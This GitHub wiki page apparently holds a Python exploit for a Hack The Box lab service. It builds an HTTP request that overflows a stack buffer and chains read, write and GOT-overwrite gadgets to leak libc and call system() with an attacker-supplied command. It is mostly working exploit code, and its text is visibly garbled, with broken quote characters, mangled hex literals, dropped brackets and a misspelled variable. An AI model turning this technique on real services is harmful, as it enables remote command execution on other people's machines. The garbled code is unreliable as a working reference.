smash v3 - adydawkins/htb-rabbit GitHub Wiki
#!/usr/bin/python
import os, sys, socket
import struct
import requests
addr = (β127.0.0.1β, 9999)
cmd = sys.argv1+"\0"
#cmd = βlsβ
libcread_offset = 0Γ0e8050
libcsystem_offset = 0Γ042510
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
payload = rβGET /\AAAAβ
#filler β fill buffer with Aβs , thought this would be 536 β 4, but turns out to be 535
payload += βAβ * (535 β 4)
#overwrite RBX β offset 536
payload += βBβ * 8
#overwrite RBP β offset 544
payload += βCβ * 8
#fill before start of RSP β offset 568
payload += βDβ * 16
#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(β<Qβ, 0Γ000400cf0) #read() call loc
someother += struct.pack(β<Qβ, 0Γ000401787) #PPPR
someother += struct.pack(β<Qβ, 4) #stdin
someother += struct.pack(β<Qβ, 0Γ000602e28) #.dynamic addr
someother += struct.pack(β<Qβ, len(cmd)) #len of cmd
#leak address of read() in randomised libc
someother += struct.pack(β<Qβ, 0Γ400c50) #write() call loc
someother += struct.pack(β<Qβ, 0Γ000401787) #PPPR
someother += struct.pack(β<Qβ, 4) #stdout
someother += struct.pack(β<Qβ, 0Γ000603088) #read() in GOT
someother += struct.pack(β<Qβ, 8) #len
#call read@plt to overwrite the ptr stored in GOT
someother += struct.pack(β<Qβ, 0Γ000400cf0) #read() call loc
someother += struct.pack(β<Qβ, 0Γ000401787) #PPPR
someother += struct.pack(β<Qβ, 4) #stdin
someother += struct.pack(β<Qβ, 0Γ000603088) #read() in GOT
someother += struct.pack(β<Qβ, 8) #len
#call read@plt with address of system() in libc
someother += struct.pack(β<Qβ, 0Γ000400cf0) #read() call loc
someother += βFFFFFFFFβ # bogus
someother += struct.pack(β<Qβ, 0Γ000602e28) #.dynamic addr system()
- libc read offset = 0Γ0e8050
- libc system offset = 0Γ042510
#padding β continue filler, writing into RSP
#payload += βEβ * 150
payload = payload + someother
s.connect(addr)
#print(payload+β β+rβHTTP/1.1β+β\nβ+βHost: localhost:9999β+β\nβ+βUser-Agent: curl/7.60.0β+β\nβ+βAccept: /β+β\nβ)
s.send(payload+β β+rβHTTP/1.1β+β\nβ+βHost: localhost:9999β+β\nβ+βUser-Agent: curl/7.60.0β+β\nβ+βAccept: /β+β\nβ+β\nβ+β\nβ)
s.send(cmd)
- calculate system() addr and send back
readaddr = struct.unpack(β<Qβ, s.recv(1024))0
print βlibc read() found at 0x%.8xβ % readaddr
systemaddr = readaddr β libcread_offset + libcsytem_offset
print βlibc system() found at 0x%.8xβ % systemaddr
s.send(struct.pack(β<Qβ, systemaddr))
print s.recv(1024)
s.close